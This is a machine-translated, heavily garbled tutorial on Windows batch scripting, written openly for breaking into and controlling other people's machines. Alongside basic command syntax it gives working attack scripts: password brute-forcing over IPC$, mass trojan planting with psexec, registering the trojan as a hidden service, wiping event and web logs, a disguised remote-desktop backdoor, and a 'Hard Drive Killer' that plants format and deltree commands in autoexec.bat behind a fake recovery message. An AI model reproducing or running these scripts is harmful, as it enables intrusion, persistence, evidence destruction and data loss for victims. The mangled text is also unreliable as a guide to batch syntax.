Suddenly remembered the writing of the BAT file
So I went to the Internet.
Not a lot of content.
It seems that BAT is not very popular now -
Space.sf4u.net >>>>>
Foreword
Recently, for the discussion of batch technology, there are many good batch procedures release, but if there is no certain related knowledge, I am afraid it is not easy to understand and understand these batch files, but also can't talk about my hands-on, The ancient language cloud: "It is better to teach people to fish." Because the online seems to have no more complete textbooks, I wrote this "briefing batch tutorial>> gave new hands. Give all friends who have worked hard for the free and sharing of the network.
The batch file is a form of text file that contains one or more commands. Its file extension is .bat or .cmd. At the command prompt, the name of the approval file is submitted, or double-click the batch file, the system will call CMD.exe to run them one by one according to the order of each command in this file. Use batch files (also known as batch programs or scripts) to simplify daily or repetitive tasks. Of course, the main content of our version is to introduce some actual use in the invasion, such as the use of batch files to be mentioned later to make patch, bulk implant the latter procedures. Let's start our batch of learning trips.
1. Simple batch internal order profile
1.echo command
Open the echo or close the request back function, or display the message. If there is no parameters, the echo command will display the current echo setting.
grammar
echo [{on | OFF}] [Message]
Sample: @echo off / echo hello world
In practical applications, we will combine this command and redirect symbol (also known as pipe symbols, generally >> ^) to implement the input of some commands to specific formats. This will be embodied in the later example .
2. @ 令
Indicates that @ later commands, in the invasion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use.
Sample: @echo off
@echo now initializing the program, please wait a minite ...
@format x: / q / u / autoset (format This command is not available / y this parameter, gratifying that Microsoft has left an Autoset parameter to us, the effects and / Y are the same.)
3.goto command
The specified jump to the label. After finding the label, the program will process the command starting from the next row.
Syntax: goto label (Label is the parameter, specifies the row in the batch program to be turned.)
SAMPLE:
IF {% 1} == {} GOTO NOPARMS
IF {% 2} == {} goto noparms (if you don't understand, you don't understand, you will have a detailed explanation.)
@Rem Check Parameters if Null show usage
: NopArms
Echo usage: Monitor.bat Serverip portnumber
Goto end
The name of the label can be random, but it is best to make a meaningful letter, let me add one: used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions.
4.Rem Command
Comment command, quite with / * in the C language -------- * /, which does not be executed, just a role of a comment, easy to read and modify it later. Rem message
Sample: @Rem Here Is The Description.
5.pause command
When you run the PAUSE command, the following message is displayed:
..
SAMPLE:
@echo off
: Begin
Copy a: *. * D: / back
Echo please put a new disk Into Driver A
PAUSE
Goto Begin
In this example, all files on the disk A in the drive A are copied to the D: / BACK. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing.
6.call command
Another batch program is called from a batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line.
grammar
Call [[Drive:] [PATH] FileName [BatchParameters]] [: label [arguments]]]]]
parameter
[Drive:} [PATH] FileName
Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.
7.Start command
Call external programs, all DOS commands and command line programs can be called by the start command.
Intrusion common parameters:
MIN starts when the window is minimized
Separate starts 16-bit Windows programs within separate spaces
High at the High Priority Category Start Application
RealTime starts an application at the RealTime priority category
Wait launches the app and waits it over
Parameters These are parameters transmitted to command / programs
When the execution application is a 32-bit GUI application, the cmd.exe does not equal the application to terminate the command prompt. If executed within the command script, the new behavior will not happen.
8.choice command
Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ...
Such as: Choice / C: DME DEFRAG, MEM, END
Will display
DEFRAG, MEM, END [D, M, E]?
SAMPLE:
The contents of Sample.bat are as follows:
@echo off
Choice / C: DME DEFRAG, MEM, END
IF Errorlevel 3 Goto Defrag (should judge the highest value of the value first)
IF Errorlevel 2 Goto Mem
IF Errotlevel 1 goto end
: defrag
C: / DOS / DEFRAG
Goto end
: MEM
MEM
Goto end
: END: END
Echo good bye
After this file runs, the DEFRAG, MEM, END [D, M, E]? The user can select DME, then the IF statement will make a judgment, and D represents the block segment executing the label DEFRAG, and M represents the program that is labeled MEM. Segment, e represents a block that executes the label End, and each block is finally jumped to the END Number with Goto End, and then the program will display good Bye and the file ends.
9.if Command
The if indicates whether it is determined whether or not the specified condition is determined to determine the execution of different commands. There are three formats: 1, if "==" string "to be executed
If the parameter is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers)
If IF "% 1" == "a" Format A:
IF {% 1} == {} GOTO NOPARMS
IF {% 2} == {} GOTO NOPARMS
2, if the ife file name to be executed
If you have a specified file, the condition is true, run the command, otherwise run the next sentence.
If exist config.sys edit config.sys
3, if ErrorleVel / if Not Errorlevel Digital Terminal To Perform
If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence.
If Errorlevel 2 Goto X2
The DOS program runs back a number to DOS, called error code errorlevel or returns, and the common return code is 0, 1.
10.FOR command
The for command is a complicated command, primarily for parameters to loop execute commands within the specified range.
When using the for command in the batch file, specify a variable, please use %% Variable
For {% variable | %% variable} in (set) do command [commandLineOptions]
% variable specifies a single letter replaceable parameter.
(SET) Specify one or a set of files. You can use wildcards.
Command specifies the command to execute each file.
Command-parameters specifies parameters or command line switches for a specific command.
When using the for command in the batch file, specify a variable, please use %% Variable
Not to use% Variable. The variable name is case sensitive, so% I is different from% i
If the command extension is enabled, the following additional for command format will be
stand by:
FOR / D% Variable in (SET) Do Command [Command-Parameters]
If the concentration contains a wildcard, specify matching with the directory name without matching the file name.
FOR / R [[DRIVE:] PATH]% Variable in (set) Do Command [Command "
Check the directory tree in [Drive:] Path to the root, point to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated.
FOR / L% Variable in (Start, Step, End) Do Command [Command-Para
This set represents a digital sequence from the beginning to the end in incremental form.
Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce sequences (5 4 3 2 1)
FOR / F ["Options"]% Variable in (file-set) Do Command
FOR / F ["Options"]% variable in ("string") Do Command
FOR / F ["Options"]% variable in ('command') Do Command
Or, if there is a UseBackQ option:
FOR / F ["Options"]% Variable in (file-set) Do Command
FOR / F ["Options"]% variable in ("string") do commandfor / f ["options"]% variable in ('command') Do Command
Filenameset is one or more file names. Continue to Filenameset
Before the next file, each file has been opened, read and processed.
Processing includes reading a file, dividing it into a line of rows, and then
Analyze into zero or more symbols. Then use the symbol string variable value
Call the for loop. With the default, / f is separated from each line of each file
The first blank symbol. Skip blank lines. You can choose Options "by specifying
Parameter replacing the default parsing operation. This string with quotes includes one or more
Specify the keywords for different parsing options. These keywords are:
EOL = C - Refers to the end of a row bet release character (one)
Skip = n - refers to the number of rows ignored at the beginning of the file.
Delims = xxx - Indicator jacket set. This replacement space and jumping
Default separator set.
Tokens = x, y, m-n - means which symbols per line are passed to each iteration
For itself. This can cause the additional variable name
The format is a range. Specify M via NTH symbol
The last character in the symbol string is asterisk,
So extra variables will be parsed in the last symbol
Allocate and accept the retention text.
Usebackq - Specify new grammar has been used under the case:
Perform a back quoted string as a command and
Quatrical characters are text string commands and allowed in FI
Use dual quotes to expand the file name.
Sample1:
FOR / F "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command
Will analyze each row in myfile.txt, ignore those rows that are headed by semicolons,
The second and third symbols in each row are passed to the For Prproduction; with a tune and / or
Space symbol symbol. Please note that the statement of this FOR program references% i
Take the second symbol, reference% J to get the third symbol, reference% K
To get all the remaining symbols after the third symbol. For files with spaces
Name, you need to enclose the file with double quotes. In this way
With double quotes, you also need to use the UseBackQ option, otherwise, the double quotes will
Understanding is used as a string that defines a certain analysis.
% i specifically in the For statement,% J and% K are passed
The tokens = option is specifically description. You can pass tokens = line
Specify up to 26 symbols, as long as you don't try to explain a higher than the letter 'Z' or
'Z' variable. Remember, for variables are single letters, case sensitive and global;
At the same time, there is no more than 52 or more.
You can also use FOR / F analysis logic on adjacent strings;
Enclose the filenameset between brackets with a single quotation. This way, this character
Plan will be regarded as a single input line in a file.
Finally, you can use the for / f command to analyze the output of the command. The method is
The filenameset between brackets becomes a hind string. This string will
It is regarded as a command line, passes to a sub-cmd.exe, and its output will be grasp
Memory and is used as a file analysis. Therefore, the following examples:
FOR / F "USEBACKQ DELIMS =="% i in (`set`) do @echo% i
Will enumerate the name of the environment variable in the current environment.
In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options for symptoms:
~ I - Delete any quotes ("), expand% i
% ~ Fi - expand% i to a fully qualified path name
% ~ Di - expand% i to a drive letter
% ~ Pi - expand% i to a path
% ~ Ni - expand% i to a file name
% ~ xi - expand% i to a file extension
% ~ Si - The extended path only contains a short name
% ~ AI - expand% i to file properties
% ~ Ti - expand% i to file date / time
% ~ zi - expand% i to the size of the file
% ~ $ PATH: I - Find the directory column of path environment variables and expand% i
The first completely qualified name found. If the environment variable
Not defined, or if the file is not found, this combination key will expand
Nicker
Multiple results can be combined to get multiple results:
% ~ DPI - expand% i to a drive letter and path
% ~ NXI - expand% i to a file name and extension
% ~ fsi - expand% i to a full path name with a short name
% ~ DP $ PATH: I - Find the directory column in the path environment variable and expand% i
To the first drive letter and path found.
% ~ ftzai - expand% i to Dir from similar output lines
In the above example,% I and PATH can be replaced with other effective values. % ~ Grammar
Terminate with an effective FOR variable name. Select a larger write variable name similar to% I
Read more readily, and avoid confusion with a combination of regardless of case.
The above is the official help of MS, let's take a few examples to specify the use of the for command in the invasion.
Sample2:
Use the for command to achieve the crack of violent password for a target Win2k host.
We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful.
The most important order is a: FOR / F I% in (Dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator"
Use I% to represent the password of Admin, this is connected to the value of the I% in Dict.txt. Then pass the program to run the result to the find command -
FOR / FI %% in (Dict.txt) DO NET USE // IP / IPC $ "I %%" / u: "Administrator" | Find ": command successfully complete" >> D: /ok.txt, so Ko.
Sample3:
Have you ever had a lot of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it.
The main order is only one: (when using the for command in the batch file, specify the variable using %% variable)
@for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do start call door.bat %% i %% J %% K
For use, please refer to Sample1 above, where it represents the parameter% I% J% K in door.bat in order.
CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.
Code prototype:
--------------- Cut Here The Save As a Batchfile (I Call it main.bat) -------------------- -------
@echo off
@IF "% 1" == "" GOTO USAGE
@for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) do start call ipchack.bat %% i %% J %% K
@goto end
: USAGE
@echo run this bath in dos mode.or Just Double-Click IT.
: END: END
--------------- Cut Here The Save As a Batchfile (I Call it main.bat) -------------------- -------
------------------- Cut hered (i call it door.bat) ----------------------------------------------------------------------------------------------------------------------------------- -------------
@NET USE / /% 1 / IPC $% 3 / U: "% 2"
@if Errorlevel 1 Goto Failed
@echo trying to establish the ipc $ connection ............ ok
@copy windrv32.exe //% 1 / admin $ / system32 && if not errorlevel 1 echo ip% 1 user% 2 PWD% 3 >> KO.TXT
@PSexec //% 1 C: /Winnt/System32/Windrv32.exe
@PSEXEC / /% 1 NET Start Windrv32 && if Not Errorlevel 1 Echo% 1 Backdooored >> Ko.txt
: Failed
@echo sorry can not connect to the VICTIM.
----------------- Cut Here Ten Save as a batChfile (i call it door.bat) ------------------ ----------------
This is just a prototype, two batch and latte programs (Windrv32.exe), psexec.exe, need to be placed in a unified directory. Batch content
It cannsterately expand, for example, add the ability to clear the log DDOS, add the function of the timed to add the user, more deeper, can make it automatically propagated (worm). Not much narrative, interested friends can study.
II. How to use parameters in batch files
Parameters can be used in batches, usually from 1% to 9%, when there are multiple parameters, you need to move with Shift, this situation is not very common, we don't consider it.
Sample1: fomat.bat@echo off
IF "% 1" == "a" Format A:
: Format
@format a: / q / u / auotset
@echo please insert Another Disk to Driver A.
@pause
@goto fomat
This example is used to continuously format a few floppy disks, so you need to enter fomat.bat a at the DOS window when you use it, huh, it seems to have a bit drawing the snake to add ~ ^ _ ^
Sample2:
When we want to build an IPC $ Connection, you must always enter a big string command. If we can't get it wrong, we better write some fixed commands to a batch, put the broiler IP password username to assign it to the parameters. This batch, so you don't have to play a command every time.
@echo off
@NET USE / / 1% / IPC $ "2%" / u: "3%" Note Oh, this PASSWORD is the second parameter.
@if Errorlevel 1 Echo Connection Faled
How is it, use the parameters or simpler? You have learned to learn ^ _ ^.
3. How to use a combination command (Compound Command)
1.&
USAGE: The first command & second command [& Article 3 Commands ...]
Use this method to perform multiple commands at the same time, regardless of whether or not the command is successful
SAMPLE:
C: /> DIR Z: & DIR C: / EX4RCH
The System Cannot Find The path specified.
Volume in Drive C Has No Label.
Volume Serial Number IS 0078-59FB
Directory of C: / EX4RCH
.23:51
2002-05-14 23:51
2002-05-14 23:51 14 Sometips.gif
2.&&
USAGE: The first command && second order [&& Article 3 Commands ...]
In this way, multiple commands can be performed simultaneously. When you encounter an error, you will not perform the back command, if there is no error, you have been executed all commands;
SAMPLE:
C: /> DIR Z: && Dir C: / EX4RCH
The System Cannot Find The path specified.
C: /> DIR C: / EX4RCH && DIR Z:
Volume in Drive C Has No Label.
Volume Serial Number IS 0078-59FB
Directory of C: / EX4RCH
2002-05-14 23:55
2002-05-14 23:55
2002-05-14 23:55 14 Sometips.gif
1 File (s) 14 bytes
2 DIR (s) 768, 671, 744 bytes Free
The System Cannot Find The path specified.
This may be relatively simple when doing backups, such as:
Dir file: //192.168.0.1/database/backup.mdb && copy file: //192.168.0.1/database/backup.mdb E: / backup If there is a backup.mdb file on the remote server, if you do not There is no copy command to exist if the file is present. This usage can be replaced if exist :)
3. ||
USAGE: The first command || Second order [|| Article 3 Commands ...]
In this way, multiple commands can be performed simultaneously. When you encounter the correct command, you will not execute the back command. If you do not have a correct command, you have been executed all commands;
SAMPLE:
C: / EX4RCH> DIR Sometips.gif || Del Sometips.gif
Volume in Drive C Has No Label.
Volume Serial Number IS 0078-59FB
Directory of C: / EX4RCH
2002-05-14 23:55 14 Sometips.gif
1 File (s) 14 bytes
0 DIR (s) 768, 696, 320 bytes Free
Examples of combined commands:
SAMPLE:
@Copy Trojan.exe //% 1 / Admin $ / SYSTEM32 && IF NOT Errorlevel 1 Echo IP% 1 User% 2 Pass% 3 >> Victim.txt
Fourth, the use of pipeline orders
1.
USAGE: First Command | 2 Command [| Article 3 Commands ...]
Use the results of the first command as the parameters of the second command, remember this method in Unix is very common.
SAMPLE:
Time / >D: /ip.log
Netstat -n -p TCP | FIND ": 3389" >> D: /ip.log
START Explorer
Did you see it? Used for Terminal Services Allows us to customize the starting program for users to achieve the following BAT to get the IP of the login user.
2.>, >> Output Redirection Command
Redirection of a command or a program output result to a specific file,> >> Differences in >>> >> Write the specified file after the content in the file, and >> will only add content to the designated In the file, the contents will not be changed.
Sample1:
Echo Hello World> C: / Hello.txt (stupid eXample?)
Sample2:
Now, the DLL Trojan is prevalent, and we know that SYSTEM32 is a good place to hide and seek. Many Trojans sharpened your head to drill there. DLL horses are no exception. For this, we can install the system and necessary applications, for this directory The lower EXE and DLL files make a record:
Run the CMD - Conversion Contents to System32 - Dir * .exe> EXEBACK.TXT & DIR * .DLL> DLLBACK.TXT,
Such all the names of all EXE and DLL files are recorded in EXEBACK.TXT and DLLBACK.TXT, respectively.
If you find an exception, you can't find a problem with the traditional method, you should consider whether it has souseed in the DLL Trojan.
At this time, we use the same command to record the exe and dll files in System32 into additional ExeBack1.txt and dllback1.txt, then run:
CMD - FC EXEBACK.TXT EXEBACK1.TXT> DIFF.TXT & FC DLLBACK.TXT DLLBACK1.TXT> Diff.txt. (Compare the DLL and EXE files before and after comparing with the FC command, and enter the result into Diff.txt This, so we can find some more DLL and EXE files, and then easily determine if it is more important to be parallel by DLL Trojan by viewing the creation time, version, whether it is compressed, etc. No, if there is any words, don't drop it directly, first use the regsvr32 / u trojan.dll to remove the back door DLL file, move it to the recycle station, if the system does not exception reflection, then completely delete or Submit to anti-virus software. 3. <,> &, <&
> & To write the output of a handle to another handle. <& Joint input from one handle and writes it to another handle output. These are not commonly used, and there is not much introduction. 5. How to use the batch file to operate the registry Implement a certain purpose of the specific key value of the operation registry during the intrusion process, for example, in order to reach the hidden back door, the Trojan deletes the residual key value under RUN. Or create a service to load the back door. Of course, we will also modify the registry to reinforce the system or change an attribute of the system, which requires us to have a certain understanding of the registry operation. Let's take a look at how to use the .reg file to operate the registry. (We can use batch to generate a REG file) About the operation of the registry, common is to create, modify, delete. Create Create a division, one is to create a child (Subkey) We create a file, the content is as follows: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / HACKER] Then, the script is then executed, you have created a child name "Hacker" under HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft. The other is to create a project name The file format is a typical file format, which is consistent with the file format you exported from the registry: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "Invader" = "ex4rch" "Door" = c: //winnt/system32//door.exe "Autodos" = DWORD: 02 This is in [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] Newly built: Invader, Door, About these three projects The type of Invader is "String Value" The type of Door is "Reg Sz Value" Autodos type is "dword value" 2. Modify Remodel is relatively simple, just export you need to modify, then modify it with Notepad, then import (regedit / s). 3. Delete Let's first tell the delete a project name, we create a file as follows: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "EX4RCH" = - "EX4RCH" under this script, [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] is deleted; let's take a look at the delete one child, we create a script as follows: Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] Execute this script, [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] has been deleted. I believe it is .reg files you have already mastered. Then the current goal is to use batch to create a .reg file, remember that our previous use of redirect symbols can easily create specific types of files. SAMLPE1: As the example above, if you want to generate the following registry file Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run] "Invader" = "ex4rch" "door" = HEX: 255 "Autodos" = dword: 000000128 Just like this: @echo windows registry Editor Version 5.00 >> Sample.REG @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run]> Sample.REG @echo "infader" = "ex4rch" >> Sample.REG @echo "door" = 5 >> c: //winnt/system32//door.exe >> Sample.REG @echo "autodos" = dword: 02 >> Sample.REG SAMLPE2: When we use some old Trojans, we may generate a key value to realize the self-start of Trojans in [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run (Runonce, RunServices, Runexec)] in the registry. But this is easy to expose the path to Trojans, causing Trojans to be killing, relatively safely registered with the Trojan program as a system service. Below to configure the IRC Trojan DSNX as an example (named Windrv32.exe) @start windrv32.exe @attrib h r windrv32.exe @echo [hkey_local_machine / Software / Microsoft / Windows / CurrentVersion / Run] >> Patch.dll @echo "windsnx" = - >> Patch.dll @ sc.exe create windriversrv type = kernel start = auto displayName = WindowsDriver binpath = c: /winnt/system32/windrv32.exe @Regedit / s patch.dll @Delete Patch.dll @REM [Delete the startup item in the registry in the registry, and the SC.exe will be registered as the system key service, set its properties to hide and read only, and config is started from start] @Rem is not safer ^ _ ^. Six. Wonderful instances are delivered. 1. Delete the batch of Win2K / XP system default sharing ------------------------ Cut Here the Save as .bat or .cmd file --------------- ---------------- @echo prepaling to delete all the default shares.when ready pres. @pause @echo off : Rem Check Parameters if Null show usage. IF {% 1} == {} GOTO: USAGE : Rem Code Start. echo. Echo ------------------------------------------------------------------------------- ----- echo. Echo Now deleneting all the default shares. echo. NET Share% 1 $ / Delete NET Share% 2 $ / Delete Net Share% 3 $ / Delete Net Share% 4 $ / Delete Net Share% 5 $ / Delete Net Share% 6 $ / Delete Net Share% 7 $ / Delete Net Share% 8 $ / Delete Net Share% 9 $ / Delete NET STOP Server Net Start Server echo. Echo all the shares, been deleteed echo. Echo ------------------------------------------------------------------------------- ----- echo. Echo Now Modify The Registry to Change The System Default Properties. echo. Echo Now Creating The Registry File Echo Windows Registry Editor Version 5.00> C: /DELSHARE.REG Echo [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / LANMANSERVER / Parameters] >> C: /DELSHARE.REG Echo "AutoSharewks" = dword: 00000000 >> C: /DELSHARE.REG Echo "AutoShareserver" = dword: 00000000 >> C: /DELSHARE.REG Echo Nowing Using The Registry File To Chang The System Default Properties. Regedit / s C: /DELSHARE.REG Echo Deleting The Temprotarily Files. Del C: /DELSHARE.REG Goto: End : USAGE echo. Echo ------------------------------------------------------------------------------- ----- echo. echo ☆ a example for bach file ☆ Echo ☆ [Use Batch File to Change The Sysytem Share Properties.] ☆ echo. Echo Author: EX4RCHOR: EX4RCHO MAIL: EX4RCH@hotmail.com QQ: 1672602 echo. echo error: not enough parameters echo. echo ☆ please enter the share disk you wanna delete ☆ echo. Echo for instance, to delete the default shares: Echo Delshare C D e ipc admin print echo. Echo if the disklable is not as c: D: E:, please chang it youserf. echo. Echo Example: Echo if Locak Disklable Are C: D: E: X: Y: Z: YOULD CHANG THE Command INTO: Echo delshare C D e x y z ipc admin print echo. echo *** you can delete nine shares on a useing *** echo. Echo ------------------------------------------------------------------------------- ----- Goto: EOF : END: END echo. Echo ------------------------------------------------------------------------------- ----- echo. Echo Ok, Delshare.bat Has Deleted All The Share You Assigned. Echo.ny Questions, Feel Free To Mail To EX4RCH@hotmail.com. echo echo. Echo ------------------------------------------------------------------------------- ----- echo. : Eof Echo end of the bath ------------------------ Cut Here the Save as .bat or .cmd file --------------- ---------------- 2. Comprehensive reinforcement system (giving the broiler patch) batch document ------------------------ Cut Here the Save as .bat or .cmd file --------------- ---------------- @echo windows registry Editor Version 5.00> Patch.dll @echo [HKEY_LOCAL_MACHINE / System / CurrentControlSet / Services / Lanmanserver / parameters] >> Patch.dll @echo "autoshareserver" = DWORD: 00000000 >> Patch.dll @echo "autosharewks" = dword: 00000000 >> Patch.dll @Rem [forbidden sharing] @echo [hkey_local_machine / system / currentControlset / Control / LSA] >> Patch.dll @echo "restrictanonymous" = DWORD: 00000001 >> Patch.dll @Rem [Disable anonymous login] @echo [hkey_local_machine / system / currentcontrolset / services / net / parameters] >> patch.dll@echo "smbDeviceenabled" = DWORD: 00000000 >> Patch.dll @Rem [Disable and File Access and Print Sharing] @echo [hkey_local_machine / system / currentcontrolset / service / @ remoteregistry] >> Patch.dll @echo "start" = dword: 00000004 >> Patch.dll @echo [hkey_local_machine / system / currentcontrolset / services / schedule] >> Patch.dll @echo "start" = dword: 00000004 >> Patch.dll @echo [HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows NT / CurrentVersion / Winlogon] >> Patch.dll @echo "shutdownwithoutlogon" = "0" >> Patch.dll @Rem [forbidden to shut down before login] @echo "dontdisplaylastusername" = "1" >> Patch.dll @Rem [Disabled Previous Login User Name] @Regedit / s patch.dll ------------------------ Cut Here the Save as .bat or .cmd file --------------- ---------------- The following command is to clear all the logs of broilers, prohibit some dangerous services, and modify the Terminnal Service leaving the broiler. @Regedit / s patch.dll @NET STOP W3SVC @NET Stop Event log @Del C: / Winnt / System32 / logfiles / w3svc1 /*.* / f / @Del C: / Winnt / System32 / logfiles / w3svc2 /*.* / f / @Del C: / WinNT / System32 / Config / *. Event / F / Q @Del C: / Winnt / System32dtClog /*.* / f / @Del C: / Winnt / *. TXT / F / Q @Del C: / WinNT / *. log / f / q @NET START W3SVC @NET Start Event Log @Rem [Delete Log] @NET Stop LanmanServer / Y @NET Stop Schedule / Y @NET Stop RemoteRegistry / Y @del patch.dll @echo the server has been patched, have fun. @Del patch.bat No distant service. ] @echo [hkey_local_machine / system / currentcontrolset / control / terminal server / winstations / rdp-tcp] >> Patch.dll @echo "portnumber" = dword: 00002010 >> Patch.dll@echo [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / CONTROL / TERMINAL SERVER / WDS / RDPWD / TDS / TCP >> Patch.dll @echo "portnumber" = dword: 00002012 >> Patch.dll @echo [HKEY_LOCAL_MACHINE / SYSTEM / CURRENTCONTROLSET / SERVICES / TERMDD] >> Patch.dll @echo "start" = dword: 00000002 >> Patch.dll @echo [hkey_local_machine / system / currentcontrolset / services / secuser.com] >> Patch.dll @echo "start" = dword: 00000002 >> Patch.dll @echo "error" = DWORD: 00000001 >> Patch.dll @echo "imagepath" = HEX (2): 25, 00, 53, 00, 79, 3, 3, 74, 100, 65, 6D, 00, 52, 100, 6F, 00, 6F, 00 , / >> Patch.dll @echo 74, 00, 25, 00, 5C, 00, 53, 3, 65, 100, 6D, 00, 33, 100, 32, 100, 5C, 00, 65, / >> Patch.dll @echo 00, 76, 100, 65, 00, 6E, 00, 67, 3, 2E, 00, 65, 3, 78, 100, 65, 100, 00, 00 >> Patch.dll @echo "objectname" = "localsystem" >> Patch.dll @echo "type" = dword: 00000010 >> Patch.dll @echo "description" = "Keep Record of the program and windows' message." >> Patch.dll @echo "displayname" = "Microsoft EventLog" >> Patch.dll @echo [hkey_local_machine / system / currentcontrolset / services / termservice] >> Patch.dll @echo "start" = dword: 00000004 >> Patch.dll @copy c: /winnt/system32/Ermsrv.exe c: /winnt/system32/eventlog.exe @REM [Modify 3389 connection, port is 8210 (hexadecimal 00002012), name is Microsoft Eventlog, retaining the retaining road] 3.Hard Drive Killer Pro Version 4.0 (playing batch to this level is not easy.) ------------------------ Cut Here the Save as .bat or .cmd file --------------- ------------ @ echo off Rem this program is dedecated to a Very Special Person That Does not want to be named. : start CLS Echo please Wait While Program Loads.. Call attrib -r -h c: /autoexec.bat> NUL Echo @echo off> c: /autoexec.bat Echo Call Format C: / Q / U / AutoSample> NUL >> C: /autoexec.bat Call Attrib R H C: /autoexec.bat> NUL Rem Drive Checking and Assigning The Valid Drives To The Drive Variable. SET Drive = Set alldrive = c d e f g h i j k L m N o P q r s t u v w x y z Rem code Insertion for Drive Checking Takes Place Here. Rem drivechk.bat is the file name under the root directory. Rem as far as the drive detection and drive variable settings, don't worry about how it it Rem Works, It's D / * AMN To Complicated for the average or even the excert batch programmer. REM EXCEPT for Tom Lavedas. Echo @echo off> drivechk.bat Echo @Prompt %%%% COMSPEC %%%%% 1: $ b Find "Vol"> NUL> {t} .bat % COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat Del {t} .bat Echo if Errorlevel 1 Goto Enddc >> Drivechk.bat CLS Echo please Wait While Program Loads.. Rem When Errorlevel IS 1, THEN The Above Is Not True, IF 0, THEN'S TRUE. Rem opposite of binary rules. If 0, IT WILL ELAPS to the Next Command. Echo @Prompt %%%% COMSPEC %%%%% 1: .// AD / W / -P $ b Find "Bytes"> NUL> {T} .bat % COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat Del {t} .bat Echo if Errorlevel 1 Goto Enddc >> Drivechk.bat CLS Echo please Wait While Program Loads.. Rem if Errorlevel IS 1, THE DRIVE SPECified IS A Removable Media Drive - Not Ready.rem IF Errorlevel IS 0, The IT Will Elaps to the next Command. Echo @Prompt DIR %%% 1: .// AD / W / -P $ b Find "0 bytes free"> NUL> {T} .bat % COMSPEC% / E: 2048 / c {t} .bat >> Drivechk.bat Del {t} .bat Echo if ErrorLevel 1 set drive = %% drive %% %% 1 >> Drivechk.bat CLS Echo please Wait While Program Loads.. Rem if it's error is a hard or floppy drive. Rem if it's not error is a cd-rom drive, Rem if it's not errorlevel 1, The specified drive. Echo: Enddc >> Drivechk.bat Rem Drive Checking Insertion Ends Here. "Enddc" Stands for "End DDRIVE CHECKING". Rem now We will use the program drivechk.bat to attain valid drive information. : SampledRV For %% a in (% alldrive%) Do Call drivechk.bat %% a> NUL Del Drivechk.bat> NUL IF% drive. ==. set drive = c : Form_Del Call attrib -r -h c: /autoexec.bat> NUL Echo @echo off> c: /autoexec.bat Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat Echo for %%%% a in (% drive%) Do Call Format %%%% A: / Q / U / Autosample> NUL >> C: /autoexec.bat Echo CLS >> C: /autoexec.bat Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat Echo for %%%% a in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat Echo CLS >> C: /autoexec.bat Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat Echo for %%%% a in (% drive%) Call deltree / y %%%% A: /> NUL >> C: / / /AUTOEXEC.BAT Echo CLS >> C: /autoexec.Batecho Echo Loading Windows, Please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat Echo for %%%% a in (% drive%) Do Call Format %%%% A: / Q / U / Autosample> NUL >> C: /autoexec.bat Echo CLS >> C: /autoexec.bat Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat Echo for %%%% a in (% drive%) Do Call C: /Temp.bat %%%% a bunga> NUL >> C: /autoexec.bat Echo CLS >> C: /autoexec.bat Echo Echo Loading Windows, please Wait While Microsoft Windows Recovers Your System.. >> C: /autoexec.bat Echo for %%%% a in (% drive%) Call deltree / y %%%% A: /> NUL >> C: / / /AUTOEXEC.BAT Echo 